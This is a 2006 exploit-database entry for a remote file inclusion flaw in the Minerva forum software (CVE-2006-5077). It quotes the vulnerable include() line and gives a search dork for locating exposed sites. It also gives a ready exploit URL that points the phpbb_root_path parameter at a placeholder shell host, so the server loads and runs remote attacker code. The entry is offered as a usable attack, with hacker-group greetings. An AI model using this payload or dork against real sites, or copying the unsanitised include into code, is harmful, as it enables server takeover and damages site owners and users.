Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion
Author: SHiKaA
type: webapps
platform: php
port:
date_added: 2006-09-24
date_updated: 2016-09-12
verified: 1
codes: OSVDB-29463;CVE-2006-5077
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comMinerva-238a.zip
#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download
#
#Version : All Versions
#
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vlu Code :
#--------------------------------
#
# if ( !empty($setmodules) )
#{
# include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
# $module['Forums']['Action_Logging'] = basename(__FILE__);
# return;
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRon & Simoo & Saudi HAckerz
==================================================================================================
# milw0rm.com [2006-09-25]